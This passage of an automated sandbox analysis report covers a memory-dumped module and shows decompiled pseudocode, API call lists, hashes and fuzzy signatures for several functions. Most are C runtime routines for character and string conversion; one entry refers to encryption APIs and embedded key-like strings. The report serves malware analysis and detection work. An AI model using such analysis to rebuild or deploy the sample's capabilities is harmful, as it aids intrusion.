                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$malloc$Crypt_errnolstrlen$Heaplstrcatlstrcpy$AllocateDestroyEncryptErrorFreeImportLast_callnewhrand
                                                                                                                                                  • String ID: cb5c6599c17ecb903e5248a3$ce5c7353b388cdd1475242a27c7c68b3
                                                                                                                                                  • API String ID: 805609948-632037719
                                                                                                                                                  • Opcode ID: baeab1bc73eba6bd0bc0bccc72954d803b867ebab57609b70f4e599d559b2bce
                                                                                                                                                  • Instruction ID: 0d679e560c310626a59905e20db3f53c7de18389682397fb1c70fe099f180863
                                                                                                                                                  • Opcode Fuzzy Hash: baeab1bc73eba6bd0bc0bccc72954d803b867ebab57609b70f4e599d559b2bce
                                                                                                                                                  • Instruction Fuzzy Hash: 31417BA131868595DE10DB21EA6836DA3E2F78DBCCFC84135DA8E8B758EF3DC2458741
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770E61C, Relevance: 18.1, APIs: 12, Instructions: 149COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                  			E6770E61C(signed int __ecx, void* __edx, signed long long __rbx, signed short** __rdx, void* __r8, void* __r9, void* __r10, signed int __r11) {
				void* __rsi;
				signed int _t32;
				void* _t36;
				void* _t42;
				signed int _t47;
				signed int _t49;
				signed int _t52;
				void* _t54;
				void* _t55;
				signed short _t59;
				signed long long _t75;
				signed char* _t79;
				signed short** _t110;
				void* _t112;
				signed long long _t114;
				intOrPtr* _t116;
				void* _t118;
				signed long long _t119;
				void* _t121;
				void* _t122;
				void* _t123;

				_t124 = __r11;
				_t123 = __r10;
				_t122 = __r9;
				_t121 = __r8;
				_t81 = __rbx;
				_t58 = __edx;
				_t56 = __ecx;
				 *((long long*)(_t118 + 0x18)) = __rbx;
				 *(_t118 + 0x20) = _t114;
				_push(_t112);
				_t119 = _t118 - 0x40;
				_t75 =  *0x67716000; // 0x9b7b11e8241
				_t76 = _t75 ^ _t119;
				 *(_t119 + 0x30) = _t75 ^ _t119;
				_t110 = __rdx;
				_t59 = __ecx & 0x0000ffff;
				if(( *(__rdx + 0x18) & 0x00000040) != 0) {
					L27:
					_t76 =  &(_t110[1][0xffffffffffffffff]);
					_t110[1] = _t32;
					if(_t32 < 0) {
						L30:
						_t56 = _t59 & 0x0000ffff;
						E6770FF34(_t54, _t59 & 0x0000ffff, _t58, _t59, _t76, _t81, _t110, _t114, _t121, _t122, _t123, _t124);
						L31:
						return E67706F80(_t56,  *(_t119 + 0x30) ^ _t119);
					}
					 *( *_t110) = _t59;
					L29:
					 *_t110 =  &(( *_t110)[1]);
					goto L31;
				}
				_t36 = E6770E5F4(__edx, _t76, __rdx);
				_t114 = 0x67716b10;
				if(_t36 == 0xffffffff || E6770E5F4(__edx, _t76, __rdx) == 0xfffffffe) {
					_t124 = _t114;
				} else {
					_t52 = E6770E5F4(__edx, _t76, __rdx);
					_t81 = _t52 >> 5;
					r11d = E6770E5F4(_t58, _t76, __rdx);
					r11d = r11d & 0x0000001f;
					_t124 = __r11 * 0x58 +  *((intOrPtr*)(0x67719900 + (_t52 >> 5) * 8));
				}
				if(( *(_t124 + 0x38) & 0x0000007f) == 2) {
					L25:
					_t110[1] = _t56;
					if(_t56 < 0) {
						goto L30;
					}
					 *( *_t110) = _t59;
					goto L29;
				} else {
					if(E6770E5F4(_t58, _t76, _t110) == 0xffffffff || E6770E5F4(_t58, _t76, _t110) == 0xfffffffe) {
						_t124 = _t114;
					} else {
						_t49 = E6770E5F4(_t58, _t76, _t110);
						_t81 = _t49 >> 5;
						r11d = E6770E5F4(_t58, _t76, _t110);
						r11d = r11d & 0x0000001f;
						_t124 = _t124 * 0x58 +  *((intOrPtr*)(0x67719900 + (_t49 >> 5) * 8));
					}
					if(( *(_t124 + 0x38) & 0x0000007f) == 1) {
						goto L25;
					} else {
						_t32 = E6770E5F4(_t58, _t76, _t110);
						if(_t32 != 0xffffffff) {
							_t32 = E6770E5F4(_t58, _t76, _t110);
							if(_t32 != 0xfffffffe) {
								_t47 = E6770E5F4(_t58, _t76, _t110);
								_t81 = _t47 >> 5;
								_t32 = E6770E5F4(_t58, _t76, _t110);
								_t114 = _t114 * 0x58 +  *((intOrPtr*)(0x67719900 + (_t47 >> 5) * 8));
							}
						}
						if(( *(_t114 + 8) & 0x00000080) == 0) {
							goto L27;
						} else {
							r9d = _t59 & 0x0000ffff;
							r8d = 5;
							_t42 = E6770EB78();
							_t55 = 0;
							if(_t42 == 0) {
								if( *((intOrPtr*)(_t119 + 0x20)) <= 0) {
									L24:
									goto L31;
								}
								_t116 = _t119 + 0x24;
								while(1) {
									_t22 =  &(_t110[1]);
									 *_t22 = _t110[1] - 1;
									if( *_t22 < 0) {
										_t56 = E67709274( *_t116, _t58, _t59, _t81, _t110, _t112, _t116);
									} else {
										 *( *_t110) =  *_t116;
										_t79 =  *_t110;
										_t56 =  *_t79 & 0x000000ff;
										 *_t110 =  &(_t79[1]);
									}
									if(_t56 == 0xffffffff) {
										goto L16;
									}
									_t55 = _t55 + 1;
									_t116 = _t116 + 1;
									if(_t55 <  *((intOrPtr*)(_t119 + 0x20))) {
										continue;
									}
									goto L24;
								}
							}
							L16:
							goto L31;
						}
					}
				}
			}
























                                                                                                                                                  0x6770e61c
                                                                                                                                                  0x6770e61c
                                                                                                                                                  0x6770e61c
                                                                                                                                                  0x6770e61c
                                                                                                                                                  0x6770e61c
                                                                                                                                                  0x6770e61c
                                                                                                                                                  0x6770e61c
                                                                                                                                                  0x6770e61c
                                                                                                                                                  0x6770e621
                                                                                                                                                  0x6770e626
                                                                                                                                                  0x6770e62a
                                                                                                                                                  0x6770e62e
                                                                                                                                                  0x6770e635
                                                                                                                                                  0x6770e638
                                                                                                                                                  0x6770e641
                                                                                                                                                  0x6770e644
                                                                                                                                                  0x6770e647
                                                                                                                                                  0x6770e7d2
                                                                                                                                                  0x6770e7d6
                                                                                                                                                  0x6770e7da
                                                                                                                                                  0x6770e7df
                                                                                                                                                  0x6770e7f0
                                                                                                                                                  0x6770e7f3
                                                                                                                                                  0x6770e7f6
                                                                                                                                                  0x6770e7fb
                                                                                                                                                  0x6770e81a
                                                                                                                                                  0x6770e81a
                                                                                                                                                  0x6770e7e4
                                                                                                                                                  0x6770e7e7
                                                                                                                                                  0x6770e7e7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e7eb
                                                                                                                                                  0x6770e650
                                                                                                                                                  0x6770e655
                                                                                                                                                  0x6770e666
                                                                                                                                                  0x6770e69d
                                                                                                                                                  0x6770e675
                                                                                                                                                  0x6770e678
                                                                                                                                                  0x6770e683
                                                                                                                                                  0x6770e68c
                                                                                                                                                  0x6770e68f
                                                                                                                                                  0x6770e697
                                                                                                                                                  0x6770e697
                                                                                                                                                  0x6770e6a8
                                                                                                                                                  0x6770e7bb
                                                                                                                                                  0x6770e7c3
                                                                                                                                                  0x6770e7c8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e7cd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e6ae
                                                                                                                                                  0x6770e6b9
                                                                                                                                                  0x6770e6f0
                                                                                                                                                  0x6770e6c8
                                                                                                                                                  0x6770e6cb
                                                                                                                                                  0x6770e6d6
                                                                                                                                                  0x6770e6df
                                                                                                                                                  0x6770e6e2
                                                                                                                                                  0x6770e6ea
                                                                                                                                                  0x6770e6ea
                                                                                                                                                  0x6770e6fb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e701
                                                                                                                                                  0x6770e704
                                                                                                                                                  0x6770e70c
                                                                                                                                                  0x6770e711
                                                                                                                                                  0x6770e719
                                                                                                                                                  0x6770e71e
                                                                                                                                                  0x6770e729
                                                                                                                                                  0x6770e72d
                                                                                                                                                  0x6770e73b
                                                                                                                                                  0x6770e73b
                                                                                                                                                  0x6770e719
                                                                                                                                                  0x6770e743
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e749
                                                                                                                                                  0x6770e753
                                                                                                                                                  0x6770e757
                                                                                                                                                  0x6770e75d
                                                                                                                                                  0x6770e762
                                                                                                                                                  0x6770e766
                                                                                                                                                  0x6770e776
                                                                                                                                                  0x6770e7b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e7b6
                                                                                                                                                  0x6770e778
                                                                                                                                                  0x6770e77d
                                                                                                                                                  0x6770e77d
                                                                                                                                                  0x6770e77d
                                                                                                                                                  0x6770e780
                                                                                                                                                  0x6770e7a4
                                                                                                                                                  0x6770e782
                                                                                                                                                  0x6770e788
                                                                                                                                                  0x6770e78a
                                                                                                                                                  0x6770e78d
                                                                                                                                                  0x6770e793
                                                                                                                                                  0x6770e793
                                                                                                                                                  0x6770e7a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e7ab
                                                                                                                                                  0x6770e7ad
                                                                                                                                                  0x6770e7b4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e7b4
                                                                                                                                                  0x6770e77d
                                                                                                                                                  0x6770e768
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e768
                                                                                                                                                  0x6770e743
                                                                                                                                                  0x6770e6fb

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _fileno$_errno$_invalid_parameter_noinfo
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 482796045-0
                                                                                                                                                  • Opcode ID: 81151d21986b1f272c6f507d8a9b8edd3bdaec43d3d47e2255df0b8c59b893f9
                                                                                                                                                  • Instruction ID: a86db5feea171ec20580bf6f7c3a873f3d3a8d244186c233a6ed32832903573d
                                                                                                                                                  • Opcode Fuzzy Hash: 81151d21986b1f272c6f507d8a9b8edd3bdaec43d3d47e2255df0b8c59b893f9
                                                                                                                                                  • Instruction Fuzzy Hash: DA5148B53049D881CB14EF39878827A33D1FB5ABACB141B21EB7A477E0DF68C0128702
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67703208, Relevance: 16.6, APIs: 11, Instructions: 86stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 27%
                                                                                                                                                  			E67703208(char* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a8, CHAR* _a16, long long _a24, long long _a32) {
				int _t15;
				CHAR* _t18;
				void* _t19;
				void* _t20;
				char* _t36;
				CHAR* _t41;
				void* _t70;
				void* _t75;
				char* _t76;
				int _t77;
				char* _t78;

				_t36 = __rax;
				_a8 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t70 = __rdx;
				if(__rdx == 0) {
					L7:
					_t15 = 0;
				} else {
					malloc();
					 *__rax = 0;
					_t77 = lstrlenA(??);
					_t18 = lstrlenA(??);
					_t41 =  *((intOrPtr*)(__rcx + 8));
					_a16 = _t18;
					while(1) {
						_t19 = E67707758(_t18, _t41, _t70);
						_t78 = _t36;
						if(_t36 == 0) {
							break;
						}
						_t20 = E67707758(_t19, _t41, "\">");
						_t76 = _t36;
						if(_t36 != 0) {
							_t6 =  &(_t41[1]); // 0x1
							malloc(??);
							r8d = _t20 - r14d - r13d;
							 *((char*)(_t36 - _t77 - _t78 + _t76)) = 0;
							E6770ED80(_t6, _t36, _t77 + _t78, _t75);
							lstrlenA(??);
							realloc(??, ??);
							lstrcatA(??, ??);
							_t18 = lstrcatA(??, ??);
							free(??);
							_t41 =  &(_a16[_t76]);
							continue;
						}
						break;
					}
					_t15 = lstrlenA();
					if(_t15 == 0) {
						free();
						goto L7;
					}
				}
				return _t15;
			}














                                                                                                                                                  0x67703208
                                                                                                                                                  0x67703208
                                                                                                                                                  0x6770320d
                                                                                                                                                  0x67703212
                                                                                                                                                  0x67703224
                                                                                                                                                  0x6770322d
                                                                                                                                                  0x67703325
                                                                                                                                                  0x67703325
                                                                                                                                                  0x67703233
                                                                                                                                                  0x67703238
                                                                                                                                                  0x67703240
                                                                                                                                                  0x67703253
                                                                                                                                                  0x67703256
                                                                                                                                                  0x6770325c
                                                                                                                                                  0x67703260
                                                                                                                                                  0x677032f9
                                                                                                                                                  0x677032ff
                                                                                                                                                  0x67703304
                                                                                                                                                  0x6770330a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67703273
                                                                                                                                                  0x67703278
                                                                                                                                                  0x6770327e
                                                                                                                                                  0x6770328c
                                                                                                                                                  0x6770328f
                                                                                                                                                  0x67703299
                                                                                                                                                  0x677032a8
                                                                                                                                                  0x677032b0
                                                                                                                                                  0x677032b8
                                                                                                                                                  0x677032c5
                                                                                                                                                  0x677032d3
                                                                                                                                                  0x677032e3
                                                                                                                                                  0x677032ec
                                                                                                                                                  0x677032f6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677032f6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770327e
                                                                                                                                                  0x67703313
                                                                                                                                                  0x6770331b
                                                                                                                                                  0x67703320
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67703320
                                                                                                                                                  0x6770331b
                                                                                                                                                  0x67703343

                                                                                                                                                  APIs
                                                                                                                                                  • malloc.LIBCMT ref: 67703238
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,677015BA), ref: 67703246
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 67703256
                                                                                                                                                  • malloc.LIBCMT ref: 6770328F
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 677032B8
                                                                                                                                                  • realloc.LIBCMT ref: 677032C5
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 677032D3
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 677032E3
                                                                                                                                                  • free.LIBCMT ref: 677032EC
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 67703313
                                                                                                                                                  • free.LIBCMT ref: 67703320
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrlen$_errnofreelstrcatmalloc$AllocateHeap_callnewhrealloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3361537733-0
                                                                                                                                                  • Opcode ID: 85ba626afcaf4cf264b9128607d6aac2a9f0ba92f79c65b5b33e25456641eca6
                                                                                                                                                  • Instruction ID: 48ab0978b66de07d0973e9d580da8a47b570d136fddbbca7be710641f221e45a
                                                                                                                                                  • Opcode Fuzzy Hash: 85ba626afcaf4cf264b9128607d6aac2a9f0ba92f79c65b5b33e25456641eca6
                                                                                                                                                  • Instruction Fuzzy Hash: 85317A6130978186EE04DF36A96871AA7A1BB89FDCF884435DE0E0B718EF7DC1968341
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770AE44, Relevance: 15.2, APIs: 10, Instructions: 206COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,6770B181), ref: 6770AEDE
                                                                                                                                                  • malloc.LIBCMT ref: 6770AF47
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,6770B181), ref: 6770AF7B
                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,6770B181), ref: 6770AFA2
                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,6770B181), ref: 6770AFEA
                                                                                                                                                  • malloc.LIBCMT ref: 6770B047
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,6770B181), ref: 6770B07C
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,6770B181), ref: 6770B0BC
                                                                                                                                                  • free.LIBCMT ref: 6770B0D0
                                                                                                                                                  • free.LIBCMT ref: 6770B0E1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocateHeap_callnewh
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1390791636-0
                                                                                                                                                  • Opcode ID: 4767a95f31fd795e87b6265fb6face1e8e3ca2b996d9862a43700d352de4fdbc
                                                                                                                                                  • Instruction ID: 604ed104ccc63390f99eb6c875aca2ac139356b69e17ccacf4947b7a605989f8
                                                                                                                                                  • Opcode Fuzzy Hash: 4767a95f31fd795e87b6265fb6face1e8e3ca2b996d9862a43700d352de4fdbc
                                                                                                                                                  • Instruction Fuzzy Hash: 9271A0B2304780CADB148F25DA4065A77E5F75CBE8F444A26EB6D47BE8EF39D2418700
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770E9B4, Relevance: 15.1, APIs: 10, Instructions: 123COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E6770E9B4(signed int __edx, intOrPtr __edi, intOrPtr* __rax, long long __rbx, signed int* __rcx, signed int* __rdx, void* __r8, long long _a8, signed int _a16, signed short _a32, intOrPtr _a40) {
				char _v32;
				intOrPtr _v40;
				char _v56;
				long long _v64;
				signed long long _v72;
				intOrPtr _v80;
				signed int* _v88;
				int _t38;
				intOrPtr _t42;
				signed int _t46;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr* _t64;
				int* _t68;
				void* _t78;
				signed int* _t79;
				void* _t84;
				intOrPtr _t88;

				_t84 = __r8;
				_t70 = __rcx;
				_t64 = __rax;
				_t59 = __edi;
				_a8 = __rbx;
				_a32 = r9w;
				_t78 = __r8;
				_t79 = __rdx;
				_t68 = __rcx;
				if(__rdx != 0 || __r8 == 0) {
					if(_t70 != 0) {
						 *_t70 =  *_t70 | 0xffffffff;
					}
					if(_t84 <= 0x7fffffff) {
						_t77 = _a40;
						E67707498(_t64,  &_v56, _a40);
						_t88 = _v56;
						if( *((intOrPtr*)(_t88 + 0x14)) != 0) {
							_a16 = _a16 & 0x00000000;
							_t53 =  *((intOrPtr*)(_t88 + 4));
							_t64 =  &_a16;
							_v64 = _t64;
							_v72 = _v72 & 0x00000000;
							r9d = 1;
							_v80 = _t59;
							_v88 = _t79;
							_t38 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
							if(_t38 == 0) {
								if(GetLastError() != 0x7a) {
									L15:
									E6770851C(_t64);
									 *_t64 = 0x2a;
									E6770851C(_t64);
									_t42 =  *_t64;
									if(_v32 != 0) {
										 *(_v40 + 0xc8) =  *(_v40 + 0xc8) & 0xfffffffd;
									}
									goto L17;
								}
								if(_t79 != 0 && _t78 != 0) {
									E67709420(_t39, _t53, 0, _t79, _t77, _t78);
								}
								E6770851C(_t64);
								_t52 = 0x22;
								 *_t64 = 0x22;
								E67709254();
								if(_v32 != 0) {
									 *(_v40 + 0xc8) =  *(_v40 + 0xc8) & 0xfffffffd;
								}
								goto L9;
							}
							if(_a16 != 0) {
								goto L15;
							}
							if(_t68 != 0) {
								 *_t68 = _t38;
							}
							L25:
							if(_v32 != 0) {
								 *(_v40 + 0xc8) =  *(_v40 + 0xc8) & 0xfffffffd;
							}
							goto L4;
						}
						_t46 = _a32 & 0x0000ffff;
						if(_t46 <= 0xff) {
							if(_t79 == 0) {
								L23:
								if(_t68 != 0) {
									 *_t68 = 1;
								}
								goto L25;
							}
							if(_t78 != 0) {
								 *_t79 = _t46;
								goto L23;
							}
							E6770851C(_t64);
							_t52 = _t78 + 0x22;
							 *_t64 = _t52;
							E67709254();
							if(_v32 != dil) {
								 *(_v40 + 0xc8) =  *(_v40 + 0xc8) & 0xfffffffd;
							}
							goto L9;
						} else {
							if(_t79 != 0 && _t78 != 0) {
								E67709420(_t46, 0xff, 0, _t79, _t77, _t78);
							}
							goto L15;
						}
					} else {
						E6770851C(_t64);
						_t52 = 0x16;
						 *_t64 = 0x16;
						E67709254();
						L9:
						_t42 = _t52;
						goto L17;
					}
				} else {
					if(__rcx != 0) {
						 *__rcx =  *__rcx & __edx;
					}
					L4:
					_t42 = 0;
					L17:
					return _t42;
				}
			}






















                                                                                                                                                  0x6770e9b4
                                                                                                                                                  0x6770e9b4
                                                                                                                                                  0x6770e9b4
                                                                                                                                                  0x6770e9b4
                                                                                                                                                  0x6770e9b4
                                                                                                                                                  0x6770e9b9
                                                                                                                                                  0x6770e9c9
                                                                                                                                                  0x6770e9cc
                                                                                                                                                  0x6770e9cf
                                                                                                                                                  0x6770e9d5
                                                                                                                                                  0x6770e9ed
                                                                                                                                                  0x6770e9ef
                                                                                                                                                  0x6770e9ef
                                                                                                                                                  0x6770e9f9
                                                                                                                                                  0x6770ea10
                                                                                                                                                  0x6770ea18
                                                                                                                                                  0x6770ea1d
                                                                                                                                                  0x6770ea26
                                                                                                                                                  0x6770eade
                                                                                                                                                  0x6770eae2
                                                                                                                                                  0x6770eae6
                                                                                                                                                  0x6770eaea
                                                                                                                                                  0x6770eaef
                                                                                                                                                  0x6770eaf9
                                                                                                                                                  0x6770eb01
                                                                                                                                                  0x6770eb05
                                                                                                                                                  0x6770eb0a
                                                                                                                                                  0x6770eb12
                                                                                                                                                  0x6770eb30
                                                                                                                                                  0x6770ea51
                                                                                                                                                  0x6770ea51
                                                                                                                                                  0x6770ea56
                                                                                                                                                  0x6770ea5c
                                                                                                                                                  0x6770ea65
                                                                                                                                                  0x6770ea67
                                                                                                                                                  0x6770ea6d
                                                                                                                                                  0x6770ea6d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ea67
                                                                                                                                                  0x6770eb39
                                                                                                                                                  0x6770eb48
                                                                                                                                                  0x6770eb48
                                                                                                                                                  0x6770eb4d
                                                                                                                                                  0x6770eb52
                                                                                                                                                  0x6770eb57
                                                                                                                                                  0x6770eb59
                                                                                                                                                  0x6770eb62
                                                                                                                                                  0x6770eb6c
                                                                                                                                                  0x6770eb6c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770eb62
                                                                                                                                                  0x6770eb18
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770eb21
                                                                                                                                                  0x6770eb23
                                                                                                                                                  0x6770eb23
                                                                                                                                                  0x6770eac4
                                                                                                                                                  0x6770eac8
                                                                                                                                                  0x6770ead2
                                                                                                                                                  0x6770ead2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770eac8
                                                                                                                                                  0x6770ea2c
                                                                                                                                                  0x6770ea38
                                                                                                                                                  0x6770ea87
                                                                                                                                                  0x6770eab9
                                                                                                                                                  0x6770eabc
                                                                                                                                                  0x6770eabe
                                                                                                                                                  0x6770eabe
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770eabc
                                                                                                                                                  0x6770ea8c
                                                                                                                                                  0x6770eab7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770eab7
                                                                                                                                                  0x6770ea8e
                                                                                                                                                  0x6770ea93
                                                                                                                                                  0x6770ea96
                                                                                                                                                  0x6770ea98
                                                                                                                                                  0x6770eaa1
                                                                                                                                                  0x6770eaab
                                                                                                                                                  0x6770eaab
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ea3a
                                                                                                                                                  0x6770ea3d
                                                                                                                                                  0x6770ea4c
                                                                                                                                                  0x6770ea4c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ea3d
                                                                                                                                                  0x6770e9fb
                                                                                                                                                  0x6770e9fb
                                                                                                                                                  0x6770ea00
                                                                                                                                                  0x6770ea05
                                                                                                                                                  0x6770ea07
                                                                                                                                                  0x6770ea0c
                                                                                                                                                  0x6770ea0c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ea0c
                                                                                                                                                  0x6770e9dc
                                                                                                                                                  0x6770e9df
                                                                                                                                                  0x6770e9e1
                                                                                                                                                  0x6770e9e1
                                                                                                                                                  0x6770e9e3
                                                                                                                                                  0x6770e9e3
                                                                                                                                                  0x6770ea74
                                                                                                                                                  0x6770ea83
                                                                                                                                                  0x6770ea83

                                                                                                                                                  APIs
                                                                                                                                                  • _errno.LIBCMT ref: 6770E9FB
                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 6770EA07
                                                                                                                                                  • _errno.LIBCMT ref: 6770EA51
                                                                                                                                                  • _errno.LIBCMT ref: 6770EA5C
                                                                                                                                                  • _errno.LIBCMT ref: 6770EA8E
                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 6770EA98
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000001FE,?,6770EB87), ref: 6770EB0A
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000001FE,?,6770EB87), ref: 6770EB27
                                                                                                                                                  • _errno.LIBCMT ref: 6770EB4D
                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 6770EB59
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2295021086-0
                                                                                                                                                  • Opcode ID: a8ff423339704993ff0391512ac636643803502165163a24b5bb46406ec9dffb
                                                                                                                                                  • Instruction ID: 5e5c814737caf6332d81e43d8ffb4000ae3509c1dfe0ebbd73709715f8655a48
                                                                                                                                                  • Opcode Fuzzy Hash: a8ff423339704993ff0391512ac636643803502165163a24b5bb46406ec9dffb
                                                                                                                                                  • Instruction Fuzzy Hash: 6D41C3F26056848AEB11EB64C6443BC77E0B76DBACF144A31DB6947B94CBB8C0918702
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

